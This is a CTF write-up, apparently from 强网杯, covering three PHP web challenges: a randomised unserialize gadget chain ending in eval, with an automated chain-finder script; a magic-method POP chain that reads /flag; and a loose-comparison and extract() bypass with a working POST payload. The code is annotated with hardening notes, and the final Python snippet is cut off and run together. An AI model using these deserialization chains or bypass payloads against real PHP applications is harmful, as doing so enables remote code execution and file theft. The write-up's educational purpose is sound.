# 0x01 pop_master打开题目
<?php
// index.php of the challenge as shown in the writeup. Everything below is
// reachable with two GET parameters, so the whole gadget pool in class.php
// is selectable by the request.
include "class.php";
highlight_file(__FILE__);
$a = $_GET['pop'];
$b = $_GET['argv'];
// unserialize() on raw request input: the request chooses the class of $class
// and every property value inside the object graph. Hardening would be
// json_decode(), or at least unserialize($a, ['allowed_classes' => false]).
$class = unserialize($a);
// XXXXXX stands in for the (randomised) entry method name in the writeup;
// whichever method it is, it receives the request-controlled $b.
$class->XXXXXX($b);
根据提示信息 下载源码
我滴个乖乖 2M 多的链 16 万行
// Excerpt of class.php (two of its randomly named classes). Names are
// generated, so only the shapes matter: a "sink" class whose methods eval()
// their argument, and a "link" class that forwards its argument to whatever
// object sits in its public property.
class NXlGlW {
    public $hGYbeeG;

    // Sink: the argument string is executed as PHP.
    public function HRD4CW($y3Cae) {
        eval($y3Cae);
    }

    // Sink: same as HRD4CW.
    public function C3akk9($MSL6W) {
        eval($MSL6W);
    }
}

class qAARvi {
    public $E0cUWyC;

    // Link: forwards $XHiV9 to named methods on $this->E0cUWyC when they exist.
    // Under unserialize() the object held in E0cUWyC is request-chosen, so the
    // method_exists() checks are what let one class hand off to the next.
    public function GlSPMd($XHiV9) {
        // BrLVt is not declared on the class (dynamic property creation is
        // deprecated since PHP 8.2); it has no effect on the forwarding below.
        $this->BrLVt = "GAVzp";
        if (method_exists($this->E0cUWyC, 'YAF1Wt'))
            $this->E0cUWyC->YAF1Wt($XHiV9);
        if (method_exists($this->E0cUWyC, 'KfVcH5'))
            $this->E0cUWyC->KfVcH5($XHiV9);
    }

    // Sink: eval() on its argument, after writing another undeclared property.
    public function olsElL($t43I8) {
        $this->v35pY = "TNiWd";
        eval($t43I8);
    }
}
函数名、类名都是随机生成的，最终链成功后通过 eval 执行 system("cat /flag");
太菜了不会写脚本 用手工找几十个就行了,有大佬会写脚本的教教我
贴一个 大佬的脚本
<?php
// Chain-finder script from the writeup (credited to another author). It works
// on the text of class.php only: each method's source is sliced out using
// Reflection line numbers, methods whose body contains 'eval' are recorded as
// sinks, and from each sink it walks backwards by substring search for a
// method that mentions the current one, stopping at the entry method BrtDix.
// $arr (the list of candidate objects) is presumably provided by exp_1.php,
// which is not shown on the page.
include_once "class.php";
include_once "exp_1.php";
$source = file_get_contents('class.php');
$fsource = preg_split('/' . PHP_EOL . '/', $source);
$evalfuncarr = [];   // one ['class' => obj, 'func' => name] entry per eval() sink
$popchain = [];
$i = [];             // unused

// True for method names that must never become part of a chain.
function isfuncblacklist($fname) {
    $blacklist = ['MISVgg'];
    foreach ($blacklist as $b) {
        if ($b == $fname) {
            return true;
        }
    }
    return false;
}

// Pass 1: collect every non-blacklisted method whose body text contains 'eval'.
foreach ($arr as $a) {
    $methods = get_class_methods($a);
    foreach ($methods as $method) {
        $func = new ReflectionMethod($a, $method);
        if (isfuncblacklist($func->name)) {
            continue;
        }
        $f = $func->getFileName();   // unused
        // Reflection line numbers are 1-based and inclusive; $fsource is 0-based.
        $start_line = $func->getStartLine() - 1;
        $end_line = $func->getEndLine();
        $length = $end_line - $start_line;
        $body = implode(PHP_EOL, array_slice($fsource, $start_line, $length));
        if (strstr($body, 'eval')) {
            array_push($evalfuncarr, array('class' => $a, 'func' => $method));
        }
    }
}

// Returns the first non-blacklisted method (other than $funcname itself) whose
// body text contains $funcname, as ['class' => obj, 'func' => name]; NULL if none.
// This is a plain substring match, so a method whose name is a prefix of another
// would be matched by that other method's body as well.
// $blacklist is not a global (it is local to isfuncblacklist), so that part of
// the global statement binds nothing.
function getcaller($funcname) {
    global $arr, $fsource, $blacklist;
    foreach ($arr as $a) {
        $methods = get_class_methods($a);
        foreach ($methods as $method) {
            $func = new ReflectionMethod($a, $method);
            if ($func->name === $funcname) {
                continue;
            }
            if (isfuncblacklist($func->name)) {
                continue;
            }
            $f = $func->getFileName();   // unused
            $start_line = $func->getStartLine() - 1;
            $end_line = $func->getEndLine();
            $length = $end_line - $start_line;
            $body = implode(PHP_EOL, array_slice($fsource, $start_line, $length));
            if (strstr($body, $funcname)) {
                return array('class' => $a, 'func' => $method);
            }
        }
    }
    return NULL;
}

// Pass 2: from each sink, follow callers upward until BrtDix or a dead end.
// $finded is never set to true, so every sink gets tried.
$finded = false;
foreach ($evalfuncarr as $a) {
    if ($finded == true) {
        break;
    }
    $ret = $a;
    $popchain = [];
    while (1) {
        $ret = getcaller($ret['func']);
        if ($ret == NULL) {
            // Dead end: drop the last hop and move on to the next sink.
            array_pop($popchain);
            break;
        }
        array_push($popchain, $ret);
        printf("\r[-] %s", $ret['func']);
        if ($ret['func'] == 'BrtDix') {
            printf("\n");
            var_dump($popchain);
            foreach ($popchain as $p) {
                printf("%s::%s -> ", get_class($p['class']), $p['func']);
            };
            valid($a, $popchain);
            break;
        }
    }
}

// Writes test_<sink>.php: one `new` per hop, wiring the first public property
// of each hop to the previous object (the sink object in the innermost slot),
// then calling BrtDix on the outermost object.
// Uses the first key returned by get_object_vars(), which assumes every link
// class keeps its forwarding object in its first declared property (true for
// the class.php excerpt shown in the writeup; not checked here).
function valid($evalfunc, $chain) {
    $code = "<?php\n";
    $code .= "include_once 'class.php';";
    $code .= "\$e = new " . get_class($evalfunc['class']) . "();\n";
    for ($i = 0; $i < sizeof($chain); $i++) {
        $tmp = $chain[$i];
        $propname = array_keys(get_object_vars($tmp['class']))[0];
        $t = $i - 1;
        $code .= "\$a{$i} = new " . get_class($tmp['class']) . "();\n";
        if ($i == 0) {
            $code .= "\$a{$i} ->{$propname} = \$e;\n";
        } else {
            $code .= "\$a{$i} ->{$propname} = \$a{$t} ;\n";
        }
    }
    $m = sizeof($chain) - 1;
    $code .= "\$a{$m} ->BrtDix('system(id);// ');";
    echo $code;
    echo "\n\n";
    file_put_contents("test_" . $evalfunc['func'] . ".php", $code);
}
# 0x02 [强网先锋] 赌徒 打开网站 看到一串提示信息, www.zip 下载源码
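<meta charset="utf-8">
<?php
// Challenge source from www.zip. The page pasted it twice back to back; a
// second copy would abort with "Cannot redeclare class Start", so only one
// copy is kept here. The only request handling is unserialize($_GET['hello'])
// at the bottom; everything above it is reachable through PHP magic methods
// once the request controls the object graph. Hardening: do not unserialize()
// request data at all (json_decode), or at minimum
// unserialize($s, ['allowed_classes' => false]).
error_reporting(1);

class Start
{
    public $name = 'guest';
    public $flag = 'syst3m("cat 127.0.0.1/etc/hint");';

    public function __construct()
    {
        echo "I think you need /etc/hint . Before this you need to see the source code";
    }

    // echo on $name: when $name holds an object, that object's __toString() runs.
    public function _sayhello()
    {
        echo $this->name;
        return 'ok';
    }

    // Runs automatically as soon as unserialize() has rebuilt a Start object.
    public function __wakeup()
    {
        echo "hi";
        $this->_sayhello();
    }

    public function __get($cc)
    {
        echo "give you flag : " . $this->flag;
        return;
    }
}

class Info
{
    private $phonenumber = 123123;
    public $promise = 'I do';

    public function __construct()
    {
        $this->promise = 'I will not !!!!';
        return $this->promise;
    }

    // $this->file is not a declared property. Reading ->ffiillee on whatever
    // object sits in file['filename'] triggers that object's __get().
    public function __toString()
    {
        return $this->file['filename']->ffiillee['ffiilleennaammee'];
    }
}

class Room
{
    public $filename = '/flag';
    public $sth_to_set;
    public $a = '';

    // Calls $this->a as a function; an object stored in $a is run via __invoke().
    public function __get($name)
    {
        $function = $this->a;
        return $function();
    }

    // File-read sink: $file comes from $filename, which unserialize() lets the
    // request set.
    public function Get_hint($file)
    {
        $hint = base64_encode(file_get_contents($file));
        echo $hint;
        return;
    }

    public function __invoke()
    {
        $content = $this->Get_hint($this->filename);
        echo $content;
    }
}

if (isset($_GET['hello'])) {
    unserialize($_GET['hello']);
} else {
    $hi = new Start();
}
?>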
很明显反序列化 pop 链 最终执行 Get_hint file_get_contents 获得 flag
__invoke() // 当尝试以调用函数的方式调用一个对象时，__invoke() 方法会被自动调用。
__get() // 当试图读取一个不可访问(比如 private)或不存在的属性时，类会自动调用 __get()。
Start::__wakeup => _sayhello (echo $name) => Info::__toString => $this->file['filename'] 为 Room => Room::__get => $this->a() => Room::__invoke => Get_hint
<?php
// Payload generator from the writeup. It only redeclares the properties that
// the chain needs (no methods), so running it here never triggers the magic
// methods; it just prints the serialize() form of the wired object graph.
// PHP class names are case-insensitive, so `info`, `start` and `room` resolve
// to the classes declared here; serialize() emits the names as declared.
class Start {
    public $name = 'guest';
    public $flag = 'syst3m("cat 127.0.0.1/etc/hint");';
}
class info {
    public $promise;
}
class Room {
    public $filename = '/flag';
    public $sth_to_set;
    public $a = '';
}
$info = new info();
$start = new start();
$room = new Room();
// Start::$name holds an Info so that echo in _sayhello() calls __toString().
$start->name = $info;
// 'file' is not declared on info; it is created as a dynamic property and
// serialized with the object, which is what Info::__toString() reads back.
$start->name->file['filename'] = $room;
// Room::$a holds another Room so that Room::__get() ends up calling __invoke().
$room->a = new room();
echo serialize($start);
记得要把输出开头的 hi 去掉再解码啊~
# 0x03 [强网先锋] 寻宝key1 常见绕过
<?php
header('Content-type:text/html;charset=utf-8');
highlight_file(__file__);

// Blacklist filter applied to each $ppp value below. A single, non-recursive
// preg_replace pass: the entries are joined with '|' into one pattern, so each
// entry is a regex fragment (the backslash-escaped ones match a literal
// $ ( . / , ' character).
function filter($string) {
    $filter_word = array('php', 'flag', 'index', 'KeY1lhv', 'source', 'key', 'eval', 'echo', '\$', '\(', '\.', 'num', 'html', '\/', '\,', '\'', '0000000');
    $filter_phrase = '/' . implode('|', $filter_word) . '/';
    return preg_replace($filter_phrase, '', $string);
}

// $ppp is not defined at this point, so this unset() never runs.
if ($ppp) {
    unset($ppp);
}
$ppp['number1'] = "1";
$ppp['number2'] = "1";
$ppp['nunber3'] = "1"; // typo in the original: 'number3' gets no default, so it exists only if the request supplies it
$ppp['number4'] = '1';
$ppp['number5'] = '1';
// Variable-overwrite sink: every POST key becomes a local variable, so a
// request carrying ppp[...] replaces the defaults set up just above.
extract($_POST);
$num1 = filter($ppp['number1']);
$num2 = filter($ppp['number2']);
$num3 = filter($ppp['number3']);
$num4 = filter($ppp['number4']);
$num5 = filter($ppp['number5']);

if (isset($num1) && is_numeric($num1)) {
    die("非数字");
} else {
    // Layer 1: a non-numeric string is compared with an int using '>' (loose comparison).
    if ($num1 > 1024) {
        echo "第一层";
        // Layer 2: strlen() bounds the raw string to 4 bytes, but `$num2 + 1`
        // converts the string to a number before intval() sees it.
        if (isset($num2) && strlen($num2) <= 4 && intval($num2 + 1) > 500000) {
            echo "第二层";
            // Layer 3: only the first 7 hex characters of the md5 are compared.
            if (isset($num3) && '4bf21cd' === substr(md5($num3), 0, 7)) {
                echo "第三层";
                // Layer 4: a 7-byte string that loosely equals 0 ('==', not '===').
                // Which strings satisfy this depends on the PHP major version.
                if (!($num4 < 0) && ($num4 == 0) && ($num4 <= 0) && (strlen($num4) > 6) && (strlen($num4) < 8) && isset($num4)) {
                    echo "第四层";
                    if (!isset($num5) || (strlen($num5) == 0)) die("no");
                    // '@' hides json_decode() notices; $b is only ever compared with NULL.
                    $b = json_decode(@$num5);
                    // Precedence: this is `$y = ($b === NULL)`, so $y is true for any
                    // input that is NOT valid JSON.
                    if ($y = $b === NULL) {
                        if ($y === true) {
                            echo "第五层";
                            include 'KeY1lhv.php';
                            echo $KEY1;
                        }
                    } else {
                        die("no");
                    }
                } else {
                    die("no");
                }
            } else {
                die("no");
            }
        } else {
            die("no");
        }
    } else {
        die("no111");
    }
}
1 ppp[number1]=6666a&ppp[number2]=1e10&ppp[number3]=61823470&ppp[number4]=0abcdef&ppp[number5]=adada
第二个文件下载了,提示如下: Mr.Smith 先生和 Tang 在 5 月份的时候在一个画展进行了接触,并且在某些地方写下了一些东西 我们将该月有关画展的信息做了汇总,希望你能够从中获取一些信息
压缩包用支持分段下载的下载器都可以下载
文件中有五个图片 干扰我好久
最终发现 key2 以明文形式存在于 docx 中
key2
贴出寻找脚本
1 import osfrom docx import Documentpath = r"C:\Users\xxxxx\Desktop\five_month" str_to_search = "KEY2"
